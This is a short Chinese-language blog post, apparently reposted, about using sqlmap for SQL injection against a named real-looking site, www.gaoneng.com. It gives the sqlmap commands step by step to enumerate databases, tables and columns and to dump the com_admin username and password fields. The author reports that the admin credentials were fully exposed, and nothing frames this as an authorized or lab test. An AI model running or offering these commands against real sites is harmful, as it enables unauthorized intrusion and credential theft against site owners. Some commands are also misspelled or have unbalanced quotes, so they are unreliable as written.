码迷,mamicode.com
首页 > 数据库 > 详细

sqlmap的使用

时间:2017-07-11 23:02:08      阅读:140      评论:0      收藏:0      [点我收藏+]

标签:sqlmap简单的使用


sqlmap进行注入

1、用扫描工具可以扫出注入点这里我用一个注入点进行说明。

sqlamp.py -u “http://www.gaoneng.com/product.php?cid=71

技术分享 

可以看出此处存在sql注入漏洞。

2

sqlmap.py -u “http://www.gaoneng.com/product.php?cid=71

--dbs 可以跑出存在的数据库名

技术分享 

然后可以跑gaoneng数据库中的表

Sqlmap.py -u”http://www.gaoneng.com/product.php?cid=71 -D gaoneng --tables

技术分享 

既然已经爆出数据库里的表,那就可以爆出表中的字段

Sqlmap.py -u “http://www.gaoneng.com/product.php?cid=71

-D gaoneng -T com_admin --columns

技术分享 

可以看到这个表中存在我们需要的字段,密码与用户名

Sqlmap.py -u “http://www.gaoneng.com/product.php?cid=71 

-D gaoneng -T com_admin -C username,password --dump

技术分享 

由此这个网站的管理员密码与用户名已被完全爆出。


sqlmap的使用

标签:sqlmap简单的使用

原文地址:http://13116102.blog.51cto.com/13106102/1946444

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!